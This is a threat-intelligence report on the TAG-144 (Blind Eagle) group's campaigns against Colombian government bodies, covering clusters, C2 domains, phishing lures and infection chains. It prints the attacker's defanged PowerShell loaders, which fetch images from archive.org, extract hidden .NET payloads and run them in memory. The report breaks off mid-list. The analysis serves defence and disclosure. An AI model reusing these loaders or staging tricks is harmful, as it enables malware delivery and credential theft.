{ "id": "aaea6a0e-b9ff-430d-a35c-e05d48d1d882", "created_at": "2026-04-06T01:32:23.220122Z", "updated_at": "2026-04-10T13:12:29.680059Z", "deleted_at": null, "sha1_hash": "ba28e9414078c889952e5f33706d74ff2e7184f9", "title": "TAG-144’s Persistent Grip on South American Organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 7085977, "plain_text": "TAG-144’s Persistent Grip on South American Organizations\r\nBy Insikt Group®\r\nArchived: 2026-04-06 00:48:23 UTC\r\nNote: The analysis cut-off date for this report was July 21, 2025.\r\nExecutive Summary\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144 (also known as Blind Eagle). These clusters\r\nhave operated at various times throughout 2024 and 2025, targeting a significant number of victims, primarily within the\r\nColombian government across local, municipal, and federal levels. Although the clusters share similar tactics, techniques,\r\nand procedures (TTPs) such as leveraging open-source and cracked remote access trojans (RATs), dynamic domain\r\nproviders, and legitimate internet services (LIS) for staging, they differ significantly in infrastructure, malware deployment,\r\nand other operational methods. Insikt Group also found further evidence linking TAG-144 to Red Akodon and identified\r\nvarious compromised Colombian government email accounts likely used in spearphishing campaigns.\r\nTo protect against TAG-144, security defenders should block IP addresses and domains tied to associated RATs, flag and\r\npotentially block connections to unusual LIS, and deploy updated detection rules (YARA, Sigma, Snort) for current and\r\nhistoric infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations\r\nsection for implementation guidance and Appendix B for a complete list of IoCs. In the long term, analysts should\r\ncontinuously monitor the cybercriminal ecosystem for emerging threats and adapt controls accordingly.\r\nKey Findings\r\nInsikt Group has tracked five distinct activity clusters associated with TAG-144 (Blind Eagle), each displaying\r\noverlapping yet varied TTPs and collectively targeting numerous victims, primarily within the Colombian\r\ngovernment, throughout 2024 and 2025.\r\nTAG-144 appears to maintain an extensive operational infrastructure, comprising virtual private servers (VPS), IP\r\naddresses within Colombian ISP ranges, and servers that appear to function as VPN servers. These typically host\r\ndomains registered through various dynamic DNS services such as duckdns[.]org, noip[.]com, and con-ip[.]com,\r\namong others.\r\nTAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS\r\nRAT, XWorm, and LimeRAT, among others. These payloads are typically deployed through a multi-stage infection\r\nchain that leverages an expanding set of LIS and uses steganography to obscure malicious content and evade\r\ndetection.\r\nBackground\r\nTAG-144, also known as Blind Eagle, AguilaCiega, APT-C-36, and APT-Q-98, is a threat group that has been active since at\r\nleast 2018, primarily targeting South America, especially Colombia. While the threat group’s overall motivation remains\r\nambiguous, its activity reflects both cyber-espionage and financially driven motivations. TAG-144’s primary focus appears\r\nto be on credential theft, evidenced by banking-related keylogging and browser monitoring, alongside indications of\r\nespionage, such as persistently targeting government entities and using modified RATs with surveillance functions (1, 2).\r\nThe group’s primary targets include government institutions, especially judiciary and tax authorities, alongside financial\r\nentities, petroleum and energy companies, and organizations within the education, healthcare, manufacturing, and\r\nprofessional services sectors (1, 2). Operations are mainly focused on Colombia, with additional activity in Ecuador, Chile,\r\nand Panama, and occasional campaigns in North America targeting Spanish-speaking users.\r\nInitial access typically occurs through spearphishing campaigns impersonating local government agencies, most notably\r\nColombian authorities. These campaigns leverage themes such as debt collection and judicial notifications to lure victims\r\ninto opening malicious documents (1, 2). They have often used URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to\r\nto conceal malicious links and target users geographically. TAG-144 employs geo-fencing and other detection evasion\r\nmeasures that block access from outside Colombia or Ecuador, redirecting outsiders to official government websites. TAG-144 has consistently leveraged compromised email accounts in its spearphishing campaigns, including those associated with\r\ngovernment entities and private individuals.\r\nTAG-144 leverages a range of commodity remote access trojans (RATs), including AsyncRAT, REMCOS RAT, DcRAT,\r\nnjRAT, LimeRAT, QuasarRAT, BitRAT, and a Quasar variant known as BlotchyQuasar. Its tooling also involves crypters\r\nsuch as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”, with indicators\r\npointing to the use of crypter-as-a-service offerings such as CryptersAndTools, which originates from Brazil. Additionally, it\r\nemploys steganography techniques, embedding malicious payloads within image files to evade detection.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 1 of 34\n\nTAG-144’s command-and-control (C2) infrastructure often incorporates IP addresses from Colombian ISPs alongside virtual\r\nprivate servers (VPS) such as Proton666 and VPN services like Powerhouse Management, FrootVPN, and TorGuard (1, 2).\r\nThis setup is further enhanced by the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and\r\nnoip[.]com. The threat group is suspected, though not definitively confirmed, to use compromised routers, which are then\r\nrepurposed as reverse proxies to obscure the true locations of their C2 servers and complicate attribution.\r\nThe threat group has consistently leveraged LIS, particularly during the payload staging phase. These services include\r\nwidely used platforms like Bitbucket, Discord, Dropbox, GitHub, Google Drive, Paste.ee, and lesser-known platforms such\r\nas undisclosed Brazilian image-hosting websites. Additionally, the group has been observed using compromised accounts to\r\nhost malicious content, including a Google Drive folder tied to a compromised account associated with a regional\r\nColombian government organization.\r\nThe threat group's origin remains uncertain, though multiple studies suggest it operates within the UTC-5 or UTC-4 time\r\nzones (1, 2), consistent with countries like Colombia and Ecuador, with some research specifically pointing to Colombia as\r\nits base. Notably, technical artifacts have contained both Spanish- and Portuguese-language comments. The Spanish\r\nobserved in the comments closely resembles the regional dialects commonly spoken in the targeted countries. Additionally,\r\nthe threat group has been observed using tools and services tied to the Brazilian cybercriminal underground, indicating a\r\npossible connection with Brazilian threat actors.\r\nThree key factors set TAG-144 apart within the cybercriminal ecosystem. First, while globalization, cybercriminal\r\ncollaboration, and hardware/software standardization have lowered barriers for threat actors to operate globally, threat\r\nactors, including TAG-144, often remain regionally focused due to cultural nuances, tacit knowledge, and persistence.\r\nSecond, despite some tooling improvements, TAG-144 has largely relied on consistent techniques since its emergence. Their\r\ncontinued success, reflected in a high number of victims, underscores how well-established methods remain effective over\r\ntime. Lastly, TAG-144 exemplifies the increasingly blurred lines between cybercrime and espionage, a trend that has\r\nbecome more prominent in the coming year. In this context, a comprehensive approach to tackling cyber threats becomes\r\neven more crucial, requiring improved defenses, deeper regional knowledge, and enhanced coordination.\r\nThreat Analysis\r\nInsikt Group identified five activity clusters associated with TAG-144 that were active between May 2024 and July 2025\r\n(see Figure 1). Activity periods were determined based on domain resolutions, sample submissions, and victim traffic, as\r\nobserved through Recorded Future® Network Intelligence.\r\nFigure 1: Cluster activity timelines (Source: Recorded Future)\r\nThe following clusters have been observed:\r\nCluster 1, active from February through July 2025, comprises C2 IPs primarily associated with TorGuard VPN and\r\none Colombian ISP hosting duckdns[.]org and, starting in July 2025, noip[.]com domains with static resolution and\r\nminimal rotation. Cluster 1 is linked to DcRAT, AsyncRAT, and REMCOS RAT infections targeting Colombian\r\ngovernment entities exclusively.\r\nCluster 2, active between September and December 2024, included C2 IPs tied to AS-COLOCROSSING,\r\nColombian ISPs, and VULTR hosting duckdns[.]org, con-ip[.]com, and kozow[.]com domains. Cluster 2 is\r\nassociated with AsyncRAT activity targeting the Colombian government and entities in the education, defense, and\r\nretail sectors.\r\nCluster 3, active from September 2024 to July 2025, consists of C2 IPs linked to Colombian ISP UNE EPM hosting\r\nduckdns[.]org and, occasionally, con-ip[.]com domains. Cluster 3 is associated with both AsyncRAT and REMCOS\r\nRAT deployments.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 2 of 34\n\nCluster 4, active from May 2024 to February 2025, is notable for combining malware and phishing infrastructure\r\nattributed to TAG-144.\r\nCluster 5, active from March to July 2025, consists of C2 IPs linked to GLESYS (AS42708) hosting dynamically\r\nresolving duckdns[.]org domains. Cluster 5 is associated with LimeRAT and a cracked AsyncRAT variant seen in\r\nClusters 1 and 2.\r\nInsikt Group identified infrastructure overlaps between the clusters, establishing a connection among them. Additionally, the\r\nclusters share notable similarities in TTPs, including infrastructure choices, domain naming patterns, malware deployment,\r\nand the abuse of LIS. However, each cluster also exhibits distinct differences, which are explored in detail in the following\r\nsections of this report.\r\nCluster 1\r\nInfrastructure Analysis\r\nCluster 1, active from at least February through July 2025, comprises C2 IP addresses primarily linked to TorGuard VPN\r\nservers and, in one case, a Colombian ISP. This cluster typically hosts duckdns[.]org and, more recently, noip[.]com\r\ndomains with specific naming patterns; it has also been observed deploying DcRAT, AsyncRAT, and REMCOS RAT. The IP\r\naddresses linked to Cluster 1 are listed in Appendix A. The domains consistently resolve to the same static IP addresses over\r\ntime, with minimal rotation observed within Cluster 1.\r\nThe subdomain names, likely generated by a domain generation algorithm (DGA), commonly include the word “envio”\r\nfollowed by a numeric part, as in, for example, envio16-05[.]duckdns[.]org. The names are detectable via the regex in\r\nFigure 2 and are detailed in Appendix B.\r\nenvio[0-9\\-]{2,5}\\.duckdns\\.org\r\nFigure 2: Regex for suspected DGA linked to Cluster 1 (Source: Recorded Future)\r\nWhile prior research has suggested that the TorGuard VPN servers associated with Cluster 1 are used for port forwarding,\r\nthe exposure of C2 components, such as default transport layer security (TLS) certificates tied to deployed malware\r\nfamilies, indicates these IP addresses are likely dedicated VPN instances directly controlled by TAG-144.\r\nIn addition to the TorGuard VPN servers, Cluster 1 includes IP addresses associated with Colombian ISPs, such as\r\nColombia’s primary provider, COLOMBIA TELECOMUNICACIONES S.A. E.S.P. While earlier reporting on Blind Eagle\r\nin 2020 suggested the possible use of compromised routers for C2 infrastructure, Insikt Group has not confirmed such\r\nactivity for the observed IP addresses.\r\nNotably, several domains hosted on TorGuard VPN servers listed in Appendix A were previously resolved to IP addresses\r\nbelonging to Colombian ISPs, such as trabajonuevos[.]duckdns[.]org. These IP addresses and their associated domains are\r\ndetailed in Appendix A. Similarly, certain domains, such as diazpool14[.]duckdns[.]org, were previously hosted on IP\r\naddresses linked to GLESYS (AS42708), an ASN identified in association with Cluster 5.\r\nAbuse of Legitimate Internet Services, Including lovestoblog[.]com\r\nAs is typical for TAG-144, Cluster 1 has leveraged various LIS during staging, such as Tagbox, Archive, Paste.ee, Discord,\r\nand BitBucket, and for the first time in TAG-144 activity, the free hosting platform lovestoblog[.]com by InfinityFree. More\r\nspecifically, the subdomain sudo102[.]lovestoblog[.]com hosted several text files that loaded an encoded PowerShell script,\r\nwhich retrieved the next stage of the infection chain from a JPG image hosted on archive[.]org. (See Figure 3 for the\r\ninfection chain; line breaks were added for readability.)\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 3 of 34\n\n$craploads = 'SilentlyContinue'\r\n$islamist = 'https://archive[.]org/download/new_image_20250531_1942/new_image.jpg'\r\n$seiche = New-Object System.Net.WebClient\r\n$seiche.Headers.Add('User-Agent', 'Mozilla/5.0')\r\n[byte[]]$homophobes = $seiche.DownloadData($islamist)\r\n$rythmic = [System.Text.Encoding]::UTF8.GetString($homophobes)\r\n$protamphirhine = 'INICIO\u003e\u003e'\r\n$unrubberized = '\u003c\u003cFIM\u003e\u003e'\r\n$petrograph = $ither\r\n$formylation = $rythmic.IndexOf($protamphirhine)\r\n$inconveniency = $rythmic.IndexOf($unrubberized)\r\nif ($formylation -ne -1 -and $inconveniency -ne -1 -and $inconveniency -gt $formylation) {\r\n $formylation += $protamphirhine.Length\r\n $petrograph = $rythmic.Substring($formylation, $inconveniency - $formylation)\r\n}\r\n$higgsinos = '#x#.e13ba2379fd20168b9c460418b963234_oviuqra/moc.golbo#sevol.201odus//:p##h'\r\n$higgsinos = $higgsinos.Replace('#', 't')\r\n$petrograph = $petrograph.Replace('@', 'A')\r\n$MacArthur = [System.Convert]::FromBase64String($petrograph)\r\n$aginator = [Reflection.Assembly]::Load($MacArthur)\r\n$towelette = [dnlib.IO.Home].GetMethod('VAI').Invoke(\r\n $ither,\r\n [object[]]@(\r\n $higgsinos,\r\n '', '', '',\r\n 'MSBuild', '', '', '', '',\r\n 'C:\\Users\\Public\\Downloads',\r\n 'Mattagami',\r\n 'js', '', '',\r\n 'duparted',\r\n '2', ''\r\n )\r\n)\r\nFigure 3: Payload hosted on archive[.]org URL (Source: Recorded Future)\r\nAt least one text file hosted on sudo102[.]lovestoblog[.]com included comments in Portuguese (for example, “Junta os\r\ncomandos,” which translates to “Add the commands”), a characteristic previously observed in connection with Blind Eagle\r\n(1, 2). This was suspected to indicate possible collaboration between the threat actor and external threat groups; however, it\r\ncould also be explained by the presence of Portuguese-speaking members, code reuse, or intentional false flag operations.\r\nMalware\r\nInsikt Group observed Cluster 1 using both the “1.0.7” version of AsyncRAT and a variant labeled “CRACKED BY\r\nhxxps://t[.]me/xworm_v2”, which has the mutex AsyncMutex_6SI8OkPnk . xworm_v2 is an active Telegram channel with\r\nover 300 members, known for sharing and distributing cracked versions of paid software.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 4 of 34\n\nFigure 4: Telegram channel hxxps://t[.]me/xworm_v2 (Source: Recorded Future)\r\nThe cracked version observed in connection with TAG-144 was linked to a threat actor tracked as Red Akodon in May 2024;\r\nit appeared again in June 2025 in a report potentially referencing the same threat actor based on observed TTPs, though\r\nwithout formal attribution.\r\nVictimology\r\nUsing Recorded Future Network Intelligence, Insikt Group identified a significant number of victims exclusively linked to\r\nthe Colombian government associated with Cluster 1 (see Appendix C). Network communications, as observed by\r\nRecorded Future Network Intelligence, began in March 2025 and ended in June 2025. Notably, the cessation of activity may\r\nindicate that the threat actors were either evicted, completed their objectives and withdrew voluntarily, or transitioned to\r\nother tooling and egress points.\r\nAs shown in Appendix C, multiple victims were observed communicating with several C2 servers associated with Cluster\r\n1. This activity likely resulted from changes in DNS resolution for the C2 domains over time. In some instances, Insikt\r\nGroup assesses that multiple infections occurred within the same victim network, with all compromised systems\r\ncommunicating with the C2 infrastructure through a shared egress point. In some cases, Insikt Group was unable to\r\nconclusively identify the exact victim due to multiple entities sharing the same name.\r\nInfrastructure Management\r\nAlthough the exact infrastructure management methods used by TAG-144 for Cluster 1 remain unclear at this time, Insikt\r\nGroup identified indications that the threat group may have leveraged a compromised Mikrotik router as a proxy to\r\ncommunicate with the C2 servers over a port.\r\nCluster 2\r\nInfrastructure Analysis\r\nCluster 2, active from at least September to December 2024, comprises C2 IP addresses primarily linked to AS-COLOCROSSING, Colombian ISP IP addresses, and, in at least one case, VULTR. It typically hosts duckdns[.]org or con-ip[.]com domains with specific naming patterns and has been observed deploying AsyncRAT. In a few cases, Insikt Group\r\nalso observed domains linked to the free dynamic DNS provider kozow[.]com. The IP addresses linked to Cluster 2 are listed\r\nin Appendix D.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 5 of 34\n\nThe subdomain names, likely generated by a DGA algorithm, often consist of Spanish words, as in\r\npesosdepesoslibras[.]duckdns[.]org. Sometimes, they are followed by numbers, as in paseoencarro2024[.]con-ip[.]com.\r\n(For a detailed list of these subdomain names, see Appendix A.) Notably, many of the domains currently hosted on AS-COLOCROSSING IP addresses (see Appendix D) were previously associated with IPs from Colombian ISPs, such as\r\n179[.]14[.]8[.]26, 181[.]131[.]217[.]255, 177[.]255[.]84[.]82, and 191[.]88[.]248[.]162, indicating they may have been\r\nreused across different hosting infrastructures.\r\nIn addition to the Spanish-themed domains, Insikt Group identified a large set of DuckDNS and CON-IP domains, likely\r\ngenerated by another DGA algorithm and all starting with the keyword “deadpoolstart,” followed by a four-digit number\r\n(see Appendix E). Notably, the con-ip[.]com domains resolve to the AS-COLOCROSSING IP address 64[.]188[.]9[.]172,\r\nwhile the duckdns[.]org domains all resolve to IP addresses belonging to Colombian ISPs.\r\nAbuse of Legitimate Internet Services\r\nSimilar to Cluster 1, Cluster 2 has also been observed leveraging various LIS during staging, including GitHub, Archive,\r\nPaste.ee, and more recently, the free hosting platform lovestoblog[.]com by InfinityFree, which ultimately led to an XWorm\r\ninfection using the C2 domain deadpoolstart2064[.]duckdns[.]org.\r\nInsikt Group also identified a payload named RELACIÓN DE SALDOS - CUENTA DE COBRO.pdf.exe associated with Cluster 2,\r\nwhich staged its content via two GitHub Gist URLs linked to the account SmikeY666:\r\nhxxps://gist[.]githubusercontent[.]com/SmikeY666/50447c53097f8884ffc754a8779fa2a3/raw\r\nhxxps://gist[.]githubusercontent[.]com/SmikeY666/8504274482e8e688d9489b302bfbc45e/raw\r\nThe payload results in an AsyncRAT infection, with the malware reaching out to its C2 server,\r\ncococovid202420242024[.]duckdns[.]org, which resolved to IP address 64[.]188[.]9[.]175 as of December 26, 2024.\r\nNotably, the GitHub account “SmikeY666” included a link to a 2024 Vimeo video demonstrating an allegedly cracked\r\nversion of SilverRAT, a Windows-based RAT that first appeared in 2023. It has been distributed across various forums and\r\nappears to be developed by an individual or group using the alias Anonymous Arabic.\r\nMalware\r\nInsikt Group observed Cluster 2 using the AsyncRAT variant labeled “CRACKED BY hxxps://t[.]me/xworm_v2” with the\r\nmutex AsyncMutex_6SI8OkPnk . Additionally, the cluster deployed AsyncRAT samples featuring custom mutexes such as\r\ntempcookieess , tempcokies , tempcookiee , WinCookies , Cookies , and CookiesGoogleChrome , among others. These\r\nsamples can be tracked via Recorded Future Malware Intelligence. At least some of the samples are encrypted using a\r\ncrypter attributed to Roda, a tool associated with Blind Eagle activity.\r\nVictimology\r\nUsing Recorded Future Network Intelligence, Insikt Group identified nine victims associated with Cluster 2, primarily\r\nlinked to Colombian government entities, along with victims from the education, defense, and retail sectors, among others\r\n(see Appendix F). Network communications observed by Recorded Future began in early October 2024 and ended in\r\nDecember 2024.\r\nAs with Cluster 1, multiple infections were observed within some of the victim organizations linked to Cluster 2, suggesting\r\nbroader targeting or possible lateral movement. There is also evidence of victim overlap between Clusters 1 and 2.\r\nFurthermore, based on high volumes of network traffic from Colombian ISP IP addresses to C2 ports during the relevant\r\ntimeframes, the actual number of victims is likely higher than what has been confirmed.\r\nCluster 3\r\nCluster 3, active from at least September 2024 to July 2025, comprises C2 IP addresses primarily linked to the Colombian\r\nISP UNE EPM, typically hosting DuckDNS or, in rare cases, con-ip[.]com, domains. Insikt Group has observed AsyncRAT\r\nas well as REMCOS RAT infections linked to Cluster 3. The IP addresses linked to Cluster 3 are listed in Appendix G.\r\nThe subdomain names, likely generated using a domain DGA, often incorporate Spanish names, as in\r\nsebastiancorrea905040[.]duckdns[.]org, sometimes appended with numerical sequences. (For a detailed list of these\r\nsubdomain names, see Appendix B.) Notably, one of the domains associated with Cluster 3, sebastianguerrero5040[.]con-ip[.]com, was observed resolving to the Cluster 2 IP address 64[.]188[.]9[.]177 between at least September 11 and\r\nNovember 11, 2024.\r\nSimilar to Clusters 1 and 2, Cluster 3 has also been observed abusing multiple LIS, including Tagbox, Archive, and Paste.ee,\r\namong others.\r\nCluster 4\r\nCluster 4, active from at least May 2024 to February 2025, differs from the others in that it is not only associated with\r\nmalware infrastructure but also with phishing activity attributed to TAG-144. The IP addresses linked to Cluster 4 are listed\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 6 of 34\n\nin Appendix H. The full list of domains linked to the IP addresses in Appendix H is listed in Appendix A.\nThe phishing pages linked to Cluster 4 have been observed impersonating multiple banks, including Banco Davivienda,\nBancolombia, and BBVA (see Figure 5). Notably, these lures differ from earlier ones attributed to TAG-144, which\nprimarily impersonated government entities such as tax authorities or judicial bodies. Previous campaigns also appeared to\ntarget government-affiliated individuals or organizations, as evidenced by the victims associated with Clusters 1 and 2.\nFigure 5: Phishing pages linked to Cluster 4 (Source: URLScan, URLScan, URLScan)\nNotably, a phishing page impersonating BBVA and hosted on the domain keepz[.]duckdns[.]org contained the IP address\n181[.]131[.]217[.]139 in its document object model (DOM), as seen in Figure 6. This IP was hosting the domains\nenv2023nue[.]duckdns[.]org and chichichi01[.]duckdns[.]org in 2023. The domain env2023nue[.]duckdns[.]org was\npublicly linked to APT-C-36 (Blind Eagle) and likely remained in use by the same threat actor, as it continued to host an\nopen directory containing folders related to Banco Davivienda, Banco Colombia, Banco Caja Social, and others until at least\nMarch 14, 2024, while being hosted on IP address 179[.]14[.]9[.]152. The domain chichichi01[.]duckdns[.]org served as a\nC2 domain for AsyncRAT based on public reporting and was also hosted on IP address 179[.]14[.]9[.]152 between March\n22 and May 8, 2024.\n…\n\nDirección IP: 181[.]131[.]217[.]139\n\nCopyright©2023 Bancolombia S.A.\n\n…\nFigure 6: IP address left in the DOM of a phishing page (Source: URLScan)\nCluster 5\nCluster 5, which has been active since at least March to July 2025, comprises C2 IP addresses primarily linked to GLESYS\n(AS42708), typically hosting duckdns[.]org domains. The domains linked to Cluster 5 are listed in Appendix I. Cluster 5 is\nthe only cluster associated with the deployment of LimeRAT, which in this case uses the mutex 1e97ead369 . The\nAsyncRAT variant linked to Cluster 5 is the same cracked version identified in Clusters 1 and 2. Of note, the domains\nfrequently resolve to changing IP addresses, with those observed by Insikt Group detailed in Appendix B.\nSimilar to the other clusters, Cluster 5 has also been observed leveraging various LIS during staging, including Archive,\nPaste.ee, and Tagbox.\nInfection Chain\nPhishing Email\nInsikt Group identified an email sent to undisclosed recipients from a likely compromised domain, alcaldia[@]simacota-santander[.]gov[.]co, associated with the Mayor’s Office of Simacota in the Santander department of Colombia. Infections\nstemming from this email have been confirmed to result in AsyncRAT deployment, communicating with the C2 domain\nenvio01[.]ddns[.]net, a domain previously linked to Cluster 1.\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\nPage 7 of 34\n\nDe: Alcaldía Simacota Santander \u003cREDACTED\u003e\r\nEnviado el: martes, 1 de julio de 2025 3:23 p. m.\r\nPara: undisclosed-recipients:\r\nAsunto: Cobro por intereses moratorios – Radicado 11001-28-05-03004\r\n¡Cuidado! este correo proviene de un usuario externo, no abras archivos adjuntos ni hagas clic en enlaces sin validar que el remitente y el contenido\r\nSe inicia ejecución por intereses causados por pago extemporáneo.\r\nConsulte el archivo para liquidación detallada.\r\nCordialmente,\r\nFigure 7: Text in phishing email linked to TAG-144 (left) and the English translation (right) (Source: Recorded Future)\r\nSVG Attachment\r\nThe email included an attachment named\r\nNotificacion_electronica_sentencia_preliminar_Departamento_Juridico_sxyebfiv.svg , which has a SHA256 hash of\r\n04878a5889e3368c2cf093d42006ba18a87c5054f1464900094e6864f4919899. A translated version of the attachment is\r\npresented in Figure 8, while the original Spanish version is available in Appendix J. The SVG content claims that a judicial\r\nprocess has been initiated against the recipient, outlines potential penalties, and contains a link purportedly leading to\r\nevidence and further legal details.\r\nFigure 8: Translated SVG file sent via spearphishing email (Source: Recorded Future)\r\nStaging Process Using LIS\r\nThe link embedded within the SVG file is:\r\nhxxps://cdn[.]discordapp[.]com/attachments/1389692690454548634/1389692792590307338/Notificacion_electronica_sentencia_preliminar_Departame\r\nJusticia_01.js?\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 8 of 34\n\nex=68658bc4\u0026is=68643a44\u0026hm=057a0e76212bdd4c2da95e51ac7542f60ecbd440482ee186d474e1d783afd288\u0026?\r\nid=75e6ea37-63e5-491a-a5e2-ad4c92667144\r\nA similar SVG sample was identified through a Malware Intelligence search for HTTP requests to cdn[.]discordapp[.]com\r\nthat included “Notificacion” in the query string (see Figure 9).\r\nFigure 9: Additional sample found in Recorded Future Malware Intelligence (Source: Recorded Future)\r\nAlthough the cdn[.]discordapp[.]com link was inactive at the time of analysis, Insikt Group successfully extracted the\r\ndownloaded JavaScript file from a PCAP capture. The file, named\r\nNotificacion_electronica_sentencia_preliminar_Departamento_De-Justicia_01.js , has the SHA256 hash\r\n1226a8d066328a8b6f353c9d98f1dc8128bd84f3909ae1cc6811dc1adff33c81. The script contains a mix of malicious code\r\nand benign content related to the Microsoft Print Schema. The benign portion is displayed in Figure 10. The inclusion of\r\nbenign content is likely an attempt to evade detection.\r\nFigure 10: Benign code portion contained in the JavaScript script (Source: Recorded Future)\r\nObfuscation\r\nFigure 11 shows the obfuscated malicious portion of the script. Notably, the code contains comments written in Portuguese,\r\nan aspect previously discussed in this report and also associated with activity linked to TAG-144.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 9 of 34\n\nFigure 11: Obfuscated malicious code portion contained in the JavaScript script (Source: Recorded Future)\r\nThe variables voicelessness and classe , unwellness , and isostasy are obfuscated using junk characters and later\r\ndeobfuscated via string replacement operations. These variables resolve to the following:\r\nvoicelessness and classe : MSXML2.ServerXMLHTTP.6.0\r\nunwellness : hxxp://paste[.]ee/d/TrxwtHcC/0 (as observed via URLScan)\r\nisostasy : GET\r\nThe script creates a ServerXMLHTTP object and issues a GET request to the specified paste[.]ee URL using the custom\r\nUser-Agent MyCustomAgent/1.0 . If the HTTP response returns a status code 200, the response body is executed as\r\nJavaScript.\r\nThe SHA256 hash of the response body is 591744244c7ca9cea69cde263187efde3f65a157f8e5eb885ccc1f9e078b5572. This\r\npayload contains similar string obfuscation techniques and ultimately reconstructs strings to instantiate a shell object and\r\nexecute a deobfuscated command line.\r\nFigure 12: Obfuscated payload with Portuguese comments (Source: Recorded Future)\r\nPowerShell Script\r\nThe deobfuscated command line is shown in Figure 13.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 10 of 34\n\nFigure 13: Deobfuscated PowerShell command (Source: Recorded Future)\r\nThe executed command initiates PowerShell, decodes a Base64-encoded payload, and then runs the decoded content via the\r\nInvoke-Expression cmdlet. Figure 14 shows the deobfuscated string with line breaks added.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 11 of 34\n\n$atropisomer = 'VkFJ';\r\n$pyrography = [System.Convert]::FromBase64String($atropisomer);\r\n$automaticities = [System.Text.Encoding]::UTF8.GetString($pyrography);\r\n$sycoma = 'Q2xhc3NMaWJyYXJ5MS5Ib21l';\r\n$repedation = [System.Convert]::Frombase64String($sycoma);\r\n$arboricultural = [System.Text.Encoding]::UTF8.GetString($repedation);\r\nAdd-Type -AssemblyName System.Drawing;\r\n$tormodont = 'https://archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg';\r\n$sclere = New-Object System.Net.WebClient;\r\n$sclere.Headers.Add('User-Agent','Mozilla/5.0');\r\n$sorority = $sclere.DownloadData($tormodont);\r\n$backpack = [byte[]](0x42, 0x4D, 0x72, 0x6E, 0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x\r\n$energises = -1;\r\nfor ($scattered = 0; $scattered -le $sorority.Length - $backpack.Length; $scattered++) {\r\n $lipogenys = $true;\r\n for ($Phalanx = 0; $Phalanx -lt $backpack.Length; $Phalanx++) {\r\n if ($sorority[$scattered + $Phalanx] -ne $backpack[$Phalanx]) {\r\n $lipogenys = $Brunhild;\r\n break;\r\n }\r\n }\r\n if ($lipogenys) {\r\n $energises = $scattered;\r\n break;\r\n }\r\n}\r\nif ($energises -eq -1) { return }\r\n$splenoncus = $sorority[$energises..($sorority.Length - 1)];\r\n$varicelliform = New-Object IO.MemoryStream;\r\n$varicelliform.Write($splenoncus, 0, $splenoncus.Length);\r\n$varicelliform.Seek(0, 'Begin') | Out-Null;\r\n$Hippocrene = [Drawing.Bitmap]::FromStream($varicelliform);\r\n$Coreopsis = New-Object Collections.Generic.List[Byte];\r\nfor ($reusably = 0; $reusably -lt $Hippocrene.Height; $reusably++) {\r\n for ($digoxin = 0; $digoxin -lt $Hippocrene.Width; $digoxin++) {\r\n $cradlelike = $Hippocrene.GetPixel($digoxin, $reusably);\r\n $Coreopsis.Add($cradlelike.R);\r\n $Coreopsis.Add($cradlelike.G);\r\n $Coreopsis.Add($cradlelike.B);\r\n }\r\n}\r\n$bolsterers = [BitConverter]::ToInt32($Coreopsis.GetRange(0, 4).ToArray(), 0);\r\n$scoundreldom = $Coreopsis.GetRange(4, $bolsterers).ToArray();\r\n$flamers = [Convert]::ToBase64String($scoundreldom).Replace('A','@').Replace('@','A');\r\n$supinely = '==AMv4ET5l1aC1EVvQ2LlVmLlR3chB3LvoDc0RHa'.Replace('}|','t');\r\n$amaurotic = [Convert]::FromBase64String($flamers);\r\n$sycee = [Reflection.Assembly]::Load($amaurotic);\r\n$astatizer = @($supinely,'','','','MSBuild','','','','','C:\\Users\\Public\\Downloads','creels','js','','','backticks','2','');\r\n$sycee.GetType($arboricultural).GetMethod($automaticities).Invoke($snarl,$astatizer);\r\n$Hippocrene.Dispose();\r\n$varicelliform.Dispose();\r\nFigure 14: Deobfuscated string (Source: Recorded Future)\r\nThe PowerShell script retrieves a JPG image from hxxps://archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg. It then employs steganographic techniques to scan the image’s pixel data for a specific byte\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 12 of 34\n\nmarker, which it uses to locate and extract an embedded payload. The extracted content is a .NET assembly that the script\r\nloads directly into memory. Execution is carried out by invoking the VAI method within the ClassLibrary1.Home class,\r\nallowing the payload to run without ever being written to disk.\r\nNotably, the same archive[.]org URL was observed in connection with XWorm samples associated with the domain\r\ndeadpoolstart[.]lovestoblog[.]com and\r\ndeadpoolstart2064[.]duckdns[.]org, which also featured similarly named files, including (1, 2):\r\nNUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_E.js\r\n(SHA256: 